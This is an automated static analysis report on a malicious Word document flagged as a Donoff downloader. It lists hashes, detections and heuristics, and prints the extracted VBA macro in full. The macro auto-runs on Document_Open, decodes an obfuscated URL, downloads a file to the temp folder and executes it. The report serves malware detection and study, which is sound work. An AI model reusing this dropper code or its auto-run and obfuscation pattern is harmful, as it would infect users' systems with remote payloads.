Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 7e17d8c4c4f3eca5…

MALICIOUS

Office (OLE)

31.5 KB Created: 2015-08-20 22:03:00 Authoring application: Microsoft Office Word First seen: 2015-10-05
MD5: de58521ab534004dbcf7f01780f72ed0 SHA-1: 6c321c0f5ee257382abf121996ae345635bace55 SHA-256: 7e17d8c4c4f3eca5302ba1bf6441e5dab3013aecfee3bae1f051971dc0c48d15
258 Risk Score

Heuristics 8

  • ClamAV: Doc.Downloader.Donoff-6700491-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.Donoff-6700491-0
  • Reference to URLDownloadToFile API critical SC_STR_URLDOWNLOAD
    Reference to URLDownloadToFile API
  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • URLDownloadToFile in VBA critical OLE_VBA_DOWNLOAD
    URLDownloadToFile in VBA
    Matched line in script
    "URLDownloadToFileA" (ByVal dQOIbXuPpuqCFUqrAKFjyQlE As Long, ByVal zoTdechR As String, _
  • Document_Open macro low OLE_VBA_DOCOPEN
    Document_Open macro
    Matched line in script
    Private Sub Document_Open()
  • Environ() call (env variable access) low OLE_VBA_ENVIRON
    Environ() call (env variable access)
    Matched line in script
    urlDAWGRXTfwxSUeBi = Environ$("tmp") & "\" & tggHPdEYDctF
  • Reference to ShellExecute API high SC_STR_SHELLEXEC
    Reference to ShellExecute API
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main Referenced by macro

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 1757 bytes
SHA-256: 77c76e7ed1155da08975437878ecb99f66830722fd1a3e38e8320fccca2b647a
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
'Macro Name: LcIOiqfKGGEJvo

Private Declare PtrSafe Function pnUJeULYkSR Lib "shell32.dll" Alias _
"ShellExecuteA" (ByVal ubvAIye As Long, ByVal nnm As String, _
ByVal rNUcGTSjmphF As String, ByVal UNxgiCfkxudqPP As String, ByVal rzMoHnLdDdoiAkG As String, ByVal qBHDOg As Long) As Long

Private Declare PtrSafe Function WSHcSJWhQPDpQnzNvMyC Lib "urlmon" Alias _
"URLDownloadToFileA" (ByVal dQOIbXuPpuqCFUqrAKFjyQlE As Long, ByVal zoTdechR As String, _
ByVal KRwJIYdfWwL As String, ByVal DoVXsUZnyMZMzbxvXFWIM As Long, ByVal nMXRkhEZyrnyPeznxUPt As Long) As Long

Private Sub LcIOiqfKGGEJvo()
Dim JkjzpsjIlQOwlFvmAKt As String, tggHPdEYDctF As String, urlDAWGRXTfwxSUeBi As String, vZAmBFIAYChQMBVL As String, CQbJJwjKht As String, HpGswVKHBT As String
tggHPdEYDctF = Decrypt("fyf/opd")
urlDAWGRXTfwxSUeBi = Environ$("tmp") & "\" & tggHPdEYDctF


JkjzpsjIlQOwlFvmAKt = Decrypt("1>me@fyf/wpi0iu1q66l4so:b:oz0t0npd/ypcqpse/xxx00;tquui")

WSHcSJWhQPDpQnzNvMyC 0, JkjzpsjIlQOwlFvmAKt, urlDAWGRXTfwxSUeBi, 0, 0
pnUJeULYkSR 0, "open", urlDAWGRXTfwxSUeBi, "", vbNullString, vbNormalFocus
End Sub

Private Sub Document_Open()

LcIOiqfKGGEJvo
End Sub

Private Function Decrypt(enc)
    Dim x, i, tmp
    enc = StrReverse(enc)
    For i = 1 To Len(enc)
        x = Mid(enc, i, 1)
        tmp = tmp & Chr(Asc(x) - 1)
    Next
    Decrypt = tmp
End Function


Attribute VB_Name = "NewMacros"
Sub autopen()
'
' autopen Macro
'
'

End Sub

Open this report in the interactive analyzer, or submit your own file for analysis.